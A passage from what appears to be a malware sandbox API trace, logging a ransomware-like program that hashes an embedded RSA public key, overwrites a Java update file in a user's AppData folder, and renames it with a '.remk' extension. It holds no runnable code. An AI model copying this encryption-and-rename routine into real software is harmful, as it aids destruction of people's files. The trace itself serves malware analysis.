lpOverlapped=0x0) returned 1 [0237.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.164] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0237.165] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.165] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.165] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.165] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.165] GetLastError () returned 0x0 [0237.166] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.166] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0237.166] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.166] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.166] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25810) returned 0x37cf820 [0237.168] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.168] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf258 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf2a0 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc990 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.169] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9d8 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc9c0 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.170] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.170] GetCurrentThreadId () returned 0x314 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6950 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.170] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.171] GetCurrentThreadId () returned 0x314 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca50 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9f0 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca50 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9f0 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9d8 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc990 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf2a0 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.175] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x25800, lpOverlapped=0x0) returned 1 [0237.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.176] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.176] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.177] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.177] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.177] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.177] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.177] CloseHandle (hObject=0x640) returned 1 [0237.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0237.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0237.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0237.202] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.remk")) returned 1 [0237.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.203] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.203] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c79a0 | out: hHeap=0x630000) returned 1 [0237.205] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0237.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0237.205] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c79a0 [0237.205] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0237.205] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0237.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.206] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: 